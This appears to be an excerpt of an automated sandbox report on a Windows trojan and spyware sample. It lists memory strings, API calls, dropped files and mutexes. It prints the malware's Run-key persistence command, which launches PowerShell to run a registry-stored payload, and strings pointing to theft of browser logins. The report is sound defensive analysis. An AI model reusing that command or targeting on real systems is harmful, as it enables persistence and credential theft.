        Source: Vaccinerende.exe, 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Vaccinerende.exe, 0000000F.00000002.3455198699.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.yahoo.com (Yahoo)
        Source: global trafficDNS traffic detected: DNS query: geoplugin.net
        Source: bhv64C2.tmp.15.dr, bhv4DB0.tmp.12.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
        Source: bhv64C2.tmp.15.dr, bhv4DB0.tmp.12.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0B
        Source: powershell.exe, 00000001.00000002.3356692851.00000000070F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microv
        Source: bhv64C2.tmp.15.dr, bhv4DB0.tmp.12.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0
        Source: bhv64C2.tmp.15.dr, bhv4DB0.tmp.12.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
        Source: bhv64C2.tmp.15.dr, bhv4DB0.tmp.12.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
        Source: SecuriteInfo.com.Win32.InjectorX-gen.20521.11680.exe, Vaccinerende.exe.1.drString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
        Source: powershell.exe, 00000001.00000002.3355195208.0000000005C69000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
        Source: bhv64C2.tmp.15.dr, bhv4DB0.tmp.12.drString found in binary or memory: http://ocsp.digicert.com0
        Source: powershell.exe, 00000001.00000002.3348576807.0000000004D56000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
        Source: powershell.exe, 00000001.00000002.3348576807.0000000004C01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
        Source: powershell.exe, 00000001.00000002.3348576807.0000000004D56000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
        Source: Vaccinerende.exe, Vaccinerende.exe, 00000011.00000002.3441886712.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com
        Source: Vaccinerende.exe, Vaccinerende.exe, 00000011.00000003.3441736796.000000000085D000.00000004.00000020.00020000.00000000.sdmp, Vaccinerende.exe, 00000011.00000002.3441886712.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Vaccinerende.exe, 00000011.00000003.3441653927.000000000085D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.imvu.com
        Source: Vaccinerende.exe, 0000000E.00000002.3385658786.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Vaccinerende.exe, 00000011.00000002.3441886712.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
        Source: Vaccinerende.exe, 0000000E.00000002.3385658786.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Vaccinerende.exe, 00000011.00000002.3441886712.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comr
        Source: Vaccinerende.exe, 0000000E.00000003.3385540576.000000000090D000.00000004.00000020.00020000.00000000.sdmp, Vaccinerende.exe, 0000000E.00000003.3385506073.000000000090D000.00000004.00000020.00020000.00000000.sdmp, Vaccinerende.exe, 00000011.00000003.3441736796.000000000085D000.00000004.00000020.00020000.00000000.sdmp, Vaccinerende.exe, 00000011.00000003.3441653927.000000000085D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.imvu.comta
        Source: Vaccinerende.exe, 0000000C.00000002.3452099988.0000000000193000.00000004.00000010.00020000.00000000.sdmp, Vaccinerende.exe, 0000000F.00000002.3455058048.0000000000193000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net
        Source: Vaccinerende.exe, 00000011.00000002.3441886712.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net/
        Source: powershell.exe, 00000001.00000002.3348576807.0000000004C01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lBfq
        Source: powershell.exe, 00000001.00000002.3355195208.0000000005C69000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
        Source: powershell.exe, 00000001.00000002.3355195208.0000000005C69000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
        Source: powershell.exe, 00000001.00000002.3355195208.0000000005C69000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
        Source: powershell.exe, 00000001.00000002.3348576807.0000000004D56000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
        Source: Vaccinerende.exe, 0000000C.00000002.3452587354.00000000005CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=0000000048
        Source: Vaccinerende.exe, 0000000C.00000002.3452587354.00000000005CE000.00000004.00000020.00020000.00000000.sdmp, Vaccinerende.exe, 0000000F.00000002.3455515024.00000000005BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
        Source: Vaccinerende.exe, 0000000C.00000002.3452587354.00000000005CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2LMEM
        Source: Vaccinerende.exe, 0000000C.00000002.3452587354.00000000005CE000.00000004.00000020.00020000.00000000.sdmp, Vaccinerende.exe, 0000000F.00000002.3455515024.00000000005BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
        Source: Vaccinerende.exe, 0000000C.00000002.3452587354.00000000005CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srfLMEM
        Source: Vaccinerende.exe, 0000000C.00000003.3451895239.0000000000909000.00000004.00000020.00020000.00000000.sdmp, Vaccinerende.exe, 0000000F.00000003.3454739598.0000000000589000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.liv
        Source: Vaccinerende.exe, 0000000C.00000002.3452587354.00000000005CE000.00000004.00000020.00020000.00000000.sdmp, Vaccinerende.exe, 0000000F.00000002.3455515024.00000000005BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
        Source: Vaccinerende.exe, 0000000C.00000002.3452587354.00000000005CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=000000004x
        Source: Vaccinerende.exeString found in binary or memory: https://login.yahoo.com/config/login
        Source: powershell.exe, 00000001.00000002.3355195208.0000000005C69000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
        Source: Vaccinerende.exe, Vaccinerende.exe, 00000011.00000002.3441886712.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
        Source: Vaccinerende.exeString found in binary or memory: https://www.google.com/accounts/servicelogin
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.InjectorX-gen.20521.11680.exeCode function: 0_2_004053EF GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_004053EF
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 12_2_0040987A EmptyClipboard,wcslen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,12_2_0040987A
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 12_2_004098E2 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,12_2_004098E2
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 13_2_00406DFC EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,13_2_00406DFC
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 13_2_00406E9F EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,13_2_00406E9F
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 14_2_004068B5 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,14_2_004068B5
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 14_2_004072B5 EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,14_2_004072B5
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 17_2_004068B5 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,17_2_004068B5
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 17_2_004072B5 EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,17_2_004072B5

        System Summary

        barindex
        Powershell drops PE file
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeProcess Stats: CPU usage > 49%
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess Stats: CPU usage > 49%
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 12_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,12_2_0040DD85
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 12_2_00401806 NtdllDefWindowProc_W,12_2_00401806
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 12_2_004018C0 NtdllDefWindowProc_W,12_2_004018C0
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 13_2_004016FD NtdllDefWindowProc_A,13_2_004016FD
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 13_2_004017B7 NtdllDefWindowProc_A,13_2_004017B7
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 14_2_00402CAC NtdllDefWindowProc_A,14_2_00402CAC
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 14_2_00402D66 NtdllDefWindowProc_A,14_2_00402D66
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 17_2_00402CAC NtdllDefWindowProc_A,17_2_00402CAC
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 17_2_00402D66 NtdllDefWindowProc_A,17_2_00402D66
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.InjectorX-gen.20521.11680.exeCode function: 0_2_0040333D EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_0040333D
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.InjectorX-gen.20521.11680.exeFile created: C:\Windows\brandbombernes.lnkJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.InjectorX-gen.20521.11680.exeCode function: 0_2_004069560_2_00406956
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.InjectorX-gen.20521.11680.exeCode function: 0_2_00404C2C0_2_00404C2C
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_0464E3E01_2_0464E3E0
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 12_2_0044B04012_2_0044B040
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 12_2_0043610D12_2_0043610D
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 12_2_0044731012_2_00447310
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 12_2_0044A49012_2_0044A490
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 12_2_0040755A12_2_0040755A
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 12_2_0043C56012_2_0043C560
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 12_2_0044B61012_2_0044B610
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 12_2_0044D6C012_2_0044D6C0
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 12_2_004476F012_2_004476F0
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 12_2_0044B87012_2_0044B870
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 12_2_0044081D12_2_0044081D
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 12_2_0041495712_2_00414957
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 12_2_004079EE12_2_004079EE
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 12_2_00407AEB12_2_00407AEB
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 12_2_0044AA8012_2_0044AA80
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 12_2_00412AA912_2_00412AA9
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 12_2_00404B7412_2_00404B74
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 12_2_00404B0312_2_00404B03
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 12_2_0044BBD812_2_0044BBD8
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 12_2_00404BE512_2_00404BE5
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 12_2_00404C7612_2_00404C76
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 12_2_00415CFE12_2_00415CFE
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 12_2_00416D7212_2_00416D72
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 12_2_00446D3012_2_00446D30
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 12_2_00446D8B12_2_00446D8B
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 12_2_00406E8F12_2_00406E8F
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 13_2_0040503813_2_00405038
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 13_2_0041208C13_2_0041208C
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 13_2_004050A913_2_004050A9
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 13_2_0040511A13_2_0040511A
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 13_2_0043C13A13_2_0043C13A
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 13_2_004051AB13_2_004051AB
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 13_2_0044930013_2_00449300
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 13_2_0040D32213_2_0040D322
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 13_2_0044A4F013_2_0044A4F0
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 13_2_0043A5AB13_2_0043A5AB
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 13_2_0041363113_2_00413631
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 13_2_0044669013_2_00446690
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 13_2_0044A73013_2_0044A730
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 13_2_004398D813_2_004398D8
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 13_2_004498E013_2_004498E0
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 13_2_0044A88613_2_0044A886
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 13_2_0043DA0913_2_0043DA09
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 13_2_00438D5E13_2_00438D5E
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 13_2_00449ED013_2_00449ED0
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 13_2_0041FE8313_2_0041FE83
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 13_2_00430F5413_2_00430F54
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 14_2_004050C214_2_004050C2
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 14_2_004014AB14_2_004014AB
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 14_2_0040513314_2_00405133
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 14_2_004051A414_2_004051A4
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 14_2_0040124614_2_00401246
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 14_2_0040CA4614_2_0040CA46
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 14_2_0040523514_2_00405235
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 14_2_004032C814_2_004032C8
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 14_2_004222D914_2_004222D9
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 14_2_0040168914_2_00401689
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 14_2_00402F6014_2_00402F60
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 17_2_004050C217_2_004050C2
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 17_2_004014AB17_2_004014AB
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 17_2_0040513317_2_00405133
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 17_2_004051A417_2_004051A4
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 17_2_0040124617_2_00401246
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 17_2_0040CA4617_2_0040CA46
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 17_2_0040523517_2_00405235
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 17_2_004032C817_2_004032C8
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 17_2_004222D917_2_004222D9
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 17_2_0040168917_2_00401689
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 17_2_00402F6017_2_00402F60
        Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe 9124D7696D2B94E7959933C3F7A8F68E61A5CE29CD5934A4D0379C2193B126BE
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: String function: 00413DCE appears 48 times
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: String function: 00414060 appears 50 times
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: String function: 004169A7 appears 87 times
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: String function: 0044DB70 appears 41 times
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: String function: 004165FF appears 35 times
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: String function: 00413CE8 appears 58 times
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: String function: 00422297 appears 42 times
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: String function: 00413D0C appears 36 times
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: String function: 00413D18 appears 42 times
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: String function: 00444B5A appears 37 times
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: String function: 00413025 appears 79 times
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: String function: 00416760 appears 69 times
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5916 -s 892
        Source: SecuriteInfo.com.Win32.InjectorX-gen.20521.11680.exeStatic PE information: invalid certificate
        Source: SecuriteInfo.com.Win32.InjectorX-gen.20521.11680.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Chivey57" /t REG_EXPAND_SZ /d "%Misbehavers% -windowstyle 1 $Frligheden=(gp -Path 'HKCU:\Software\Roscoelite\').Aftvttedes;%Misbehavers% ($Frligheden)"
        Source: classification engineClassification label: mal100.phis.troj.spyw.evad.winEXE@24/22@1/3
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 12_2_004182CE GetLastError,FormatMessageW,FormatMessageA,LocalFree,free,12_2_004182CE
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.InjectorX-gen.20521.11680.exeCode function: 0_2_0040333D EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_0040333D
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 14_2_00410DE1 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueA,GetProcAddress,AdjustTokenPrivileges,CloseHandle,14_2_00410DE1
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 17_2_00410DE1 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueA,GetProcAddress,AdjustTokenPrivileges,CloseHandle,17_2_00410DE1
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.InjectorX-gen.20521.11680.exeCode function: 0_2_004046B0 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004046B0
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 12_2_00413D4C CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,memset,GetModuleHandleW,GetProcAddress,CloseHandle,free,Process32NextW,CloseHandle,12_2_00413D4C
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.InjectorX-gen.20521.11680.exeCode function: 0_2_004020FE CoCreateInstance,0_2_004020FE
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 12_2_0040B58D GetModuleHandleW,FindResourceW,LoadResource,SizeofResource,LockResource,memcpy,12_2_0040B58D
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.InjectorX-gen.20521.11680.exeFile created: C:\Users\user\AppData\Roaming\intercessionateJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeMutant created: \Sessions\1\BaseNamedObjects\Rmc-DSGECX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1260:120:WilError_03
        Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5916
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6300:120:WilError_03
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.InjectorX-gen.20521.11680.exeFile created: C:\Users\user\AppData\Local\Temp\nsrE309.tmpJump to behavior
        Source: SecuriteInfo.com.Win32.InjectorX-gen.20521.11680.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSystem information queried: HandleInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.InjectorX-gen.20521.11680.exeFile read: C:\Users\desktop.iniJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.InjectorX-gen.20521.11680.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: Vaccinerende.exe, Vaccinerende.exe, 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Vaccinerende.exe, 0000000F.00000002.3455198699.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
        Source: Vaccinerende.exe, Vaccinerende.exe, 0000000D.00000002.3381339664.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Vaccinerende.exe, 0000000F.00000002.3455198699.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Vaccinerende.exe, 00000010.00000002.3440053498.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
        Source: Vaccinerende.exe, 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Vaccinerende.exe, 0000000F.00000002.3455198699.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
        Source: Vaccinerende.exe, Vaccinerende.exe, 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Vaccinerende.exe, 0000000F.00000002.3455198699.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
